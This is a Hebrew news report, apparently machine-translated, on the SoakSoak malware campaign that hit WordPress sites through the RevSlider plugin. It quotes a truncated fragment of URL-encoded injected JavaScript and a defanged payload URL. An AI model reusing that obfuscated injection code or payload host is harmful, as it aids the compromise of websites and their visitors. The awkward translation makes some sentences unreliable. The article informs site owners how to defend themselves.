יותר מ 100 000 אתרים הפועלים על מערכת ניהול התוכן של וורדפרס נדבקו לאחרונה על ידי תוכנות זדוניות מסתוריות. לאחר נגוע באתרים הפכו פלטפורמות עבור התקפות, טעינת קודים זדוניים לתוך דפי האינטרנט מוזנים על ידי הצופה.
חוקרי אבטחה לאשר כי קמפיין התוכנה זדוני זו הפך גוגל סימן יותר 11 000 תחומים כמו להיות זדוני. קמפיין זה נקרא SoakSoak, אחרי התחום הראשון כי נפגע. לדברי חברת Sucuri שעוזרת מפעילי אתר לשרתים מאובטחים שלהם לעומת זאת, ישנם אתרים רבים אחרים נצפו כמו להיות בסכנה. מומחי האבטחה מ Sucuri גילו כי הזיהום נגרם על ידי פגיעות נתיב התקפה זדונית המכונה RevSlider. זהו תוסף וורדפרס אשר נחשף דרך פורומים שונים מחתרת בתחילת ספטמבר. מומחים אומרים כי הפגיעות ידועות בשם התקפת הכללת קובץ מקומי, דבר שיאפשר לתוקף לגשת ולהוריד קובץ מקומי בשרת. נקודות תורפה כאלה צריכות להיות מיינו מייד.
חברת Sucuri זיהתה התקפה שגורמת לאתרים נגועים לטעון קוד התקפה לטשטש הרבה על כל דף אינטרנט, קוד שכולל הרכיב הבא:
→(“%28%0D%0A%66%75%6E%63%74%69%6F%6E%28%29%0D%0A%7B%0D%..72%69%70%74%2E%69%64%3D%27%78%78%79%79%7A%7A%5F%70%65%74%75%73%68%6F%6B%27%3B%0D%0A%09%68%65%61%64%2E%61%70%70%65%6E%64%43%68%69%6C%64%28%73%63%72%69%70%74%29%3B%0D%0A%7D%28%29%0D%0A%29%3B”));
קוד מסוים זה הופך את הדפים להוריד מטען זדוני hxxp: //soaksoak.ru/xteas/code. בהתבסס על ההערות של המשתמשים, המנהלים כמה האתרים הופתעו להבין שהאתרים הוא לפקח נגועים. תהליך החיטוי של אתרים אלה דורש הסרת הקוד הזדוני מתווסף תסריט הנמצא בבית wp-includes / תבנית-loader.php. זה הופך אותו קובץ JavaScript שבו ניתן לטעון לתוך כל דף באתר. לאחר הפענוח הוא יכול לטעון תוכנות זדוניות.
לכל המנהלים של פלטפורמת וורדפרס שבמקרה להשתמש plugin מהפכת Slider צריכים לוודא כי הוא מתעדכן. אפילו, החוקרים הזדוניים מתקשים לקבל את כל האתרים להחיל את התיקון באופן אוניוורסלי. זה כל כך כמו RevSlider התוסף הוא תוסף הפרימיום, לא משהו שניתן לשדרג בקלות ובכך תוסף זה הופך להיות מסוכן עבור הבעלים של האתר. זה נהיה אפילו יותר רציני כמו כמה בעלי האתר לא יודעים שהם בעצם בעלי תוסף זה בסביבתם, כפי שהוא מגיע בחבילה עם הנושאים שלהם.
הקמפיין הזדוני SoakSoak פועל באמצעות מטענים אחוריים שונים, מוזרק בטקסטים או בתמונות. הם יכולים לשמש כדי להתקין מנהל משתמשים חדשים ובכך לאפשר שליטה באתר למשך תקופה ארוכה.
מומחי האבטחה מחברת Sucuri עוד ציינו כי הם מצאו בעיות אבטחה ב plugins WordPress האחר כגון WPtouch (5,670,626 הורדות), Disqus (1,400,003 הורדות), All In One SEO Pack (19,152,355 הורדות), ו עלוני MailPoet (1,894,474 הורדות).
ממומחי האבטחה גם לשים לב כי ניקוי האתרים הנגועים לא קל. הם מציינים כי ישנן המלצות ספציפיות באינטרנט ייעוץ כי למשתמשים להחליף את swfobject.js וקבצי התבנית-loader.php כדי להסיר את הזיהום. פעילות זו אולם הוא לא ערובה, כפי שהיא תסיר את הזיהום, אבל לא לסגור את הדלתות האחוריות בנקודות הכניסה משמשות במקום הראשון וכך האתר יכול להיות נגוע שוב. ההתקפות הזדוניות לא צריכים לנקות, אלא גם כדי להיעצר. זה יכול להיעשות על ידי חומת אש אתר, אשר יכול להפחית את התקפות אפשריות על ידי תוכנות זדוניות.
מומחי האבטחה מעודדים את המשתמשים לעדכן לגרסה העדכנית הזמינה ולאחר מכן לבדוק ולנקות את רשימת משתמשי מנהל ממסד הנתונים שלהם כדי למנוע זיהומים אחרים.